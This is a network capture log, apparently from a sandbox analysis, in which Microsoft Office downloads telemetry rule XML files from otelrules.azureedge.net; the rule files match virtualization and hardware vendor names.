2024-11-07 06:33:10 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:10 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:10 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:10 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 2d5e3293-901e-002a-4f00-2d7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063310Z-16547b76f7fwvr5dhC1DFW2c9400000007p0000000009c1p x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:10 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	49804	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:10 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:11 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:10 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 2f2a95d3-901e-00ac-5b08-2cb69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063310Z-16547b76f7fj5p7mhC1DFWf8w400000007wg00000000731q x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:11 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	49802	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:10 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:11 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:10 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 162cf1ac-401e-002a-0c09-2dc62e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063310Z-16547b76f7f8dwtrhC1DFWd1zn00000007ug00000000csu4 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:11 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49803	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:10 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:11 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:11 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: c70a6fb1-401e-000a-3458-2e4a7b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063311Z-17df447cdb5wrr5fhC1DFWte8n000000043g00000000cty2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:11 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	49805	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:11 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:11 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:11 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 5df09d77-001e-00a2-0c15-2dd4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063311Z-16547b76f7f9bs6dhC1DFWt3rg00000007ug000000001h3d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:11 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49806	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:11 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:11 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:11 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: ea775dbe-901e-0016-4f03-2defe9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063311Z-16547b76f7fr4g8xhC1DFW9cqc00000006x000000000cq5a x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:11 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	49807	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:11 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:11 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:11 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 86fb44b9-501e-0078-06d2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063311Z-16547b76f7fq9mcrhC1DFWq15w00000007qg00000000c77z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:11 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49808	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:11 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:11 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:11 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 392771d5-701e-000d-1cd2-2c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063311Z-16547b76f7f9rdn9hC1DFWfk7s00000007v0000000000qyv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:11 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49809	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:11 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:11 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:11 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 898dd9bc-901e-0048-53d2-2cb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063311Z-16547b76f7fsjlq8hC1DFWehq000000007g000000000bwky x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:11 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49810	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:12 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:12 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:12 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 44d502e9-701e-000d-5c08-2c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063312Z-16547b76f7fvllnfhC1DFWxkg800000007r000000000gpea x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:12 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49811	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:12 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:12 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:12 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 95994dee-f01e-0085-5a55-2e88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063312Z-17df447cdb5zfhrmhC1DFWh33000000003z0000000004vvz x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:12 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	49812	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:12 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
